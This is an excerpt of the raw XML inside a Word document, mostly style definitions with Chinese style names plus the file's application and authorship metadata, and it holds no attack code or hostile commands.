    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="51"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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17">
    <w:name w:val="Medium Shading 2 Accent 5"/>
    <w:basedOn w:val="15"/>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rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="auto" w:sz="18" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="auto" w:sz="18" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="auto" w:sz="18" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7" w:themeFill="background1" w:themeFillShade="D8"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7" w:themeFill="background1" w:themeFillShade="D8"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="auto" w:sz="18" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="auto" w:sz="18" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:styleId="19">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="20">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="21">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="22">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="18"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="23">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="24"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="样式1 Char"/>
    <w:link w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="29">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="正文文本 (3)_"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="31"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="13"/>
      <w:szCs w:val="13"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="31">
    <w:name w:val="正文文本 (3)"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="180" w:line="210" w:lineRule="exact"/>
      <w:ind w:firstLine="300"/>
      <w:jc w:val="distribute"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="Times New Roman" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="0"/>
      <w:sz w:val="13"/>
      <w:szCs w:val="13"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="正文文本 (3) + Times New Roman"/>
    <w:basedOn w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="33">
    <w:name w:val="正文文本 (2)_"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="34"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="13"/>
      <w:szCs w:val="13"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="正文文本 (2)"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="33"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="180" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="Times New Roman" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="0"/>
      <w:sz w:val="13"/>
      <w:szCs w:val="13"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="正文文本 (2) + Times New Roman"/>
    <w:basedOn w:val="33"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="HTML 预设格式 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="正文1"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:line="340" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="正文 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="37"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="39">
    <w:name w:val="Decimal Aligned"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="40"/>
    <w:pPr>
      <w:widowControl/>
      <w:tabs>
        <w:tab w:val="decimal" w:pos="360"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="脚注文本 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="不明显强调1"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="7F"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="二级菜单"/>
    <w:basedOn w:val="3"/>
    <w:link w:val="45"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
      <w:spacing w:before="376" w:beforeAutospacing="0" w:after="452" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
      <w:ind w:firstLine="150"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="default"/>
      <w:color w:val="A52A2A"/>
      <w:sz w:val="31"/>
      <w:szCs w:val="31"/>
      <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="43">
    <w:name w:val="三级菜单"/>
    <w:basedOn w:val="23"/>
    <w:link w:val="47"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
      <w:b/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="二级菜单 Char"/>
    <w:basedOn w:val="44"/>
    <w:link w:val="42"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46">
    <w:name w:val="四级菜单"/>
    <w:basedOn w:val="23"/>
    <w:link w:val="49"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="exact"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="微软雅黑" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="三级菜单 Char"/>
    <w:basedOn w:val="24"/>
    <w:link w:val="43"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="四级菜单 Char"/>
    <w:basedOn w:val="24"/>
    <w:link w:val="46"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="微软雅黑" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="副标题 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="pln"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="pun"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="FZBSK--GBK1-0" w:hAnsi="FZBSK--GBK1-0"/>
      <w:color w:val="231F20"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000000"/>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GIF"/><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GIF"/><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9F7FBD-B8DC-452E-B0CB-1E71E2F84BE9}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <Pages>1</Pages>
  <Words>15545</Words>
  <Characters>88611</Characters>
  <Lines>738</Lines>
  <Paragraphs>207</Paragraphs>
  <TotalTime>172</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>103949</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2018-07-02T02:57:00Z</dcterms:created>
  <dc:creator>AutoBVT</dc:creator>
  <cp:lastModifiedBy>丨丶灬本心难移er丨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-12T01:13:08Z</dcterms:modified>
  <cp:revision>1350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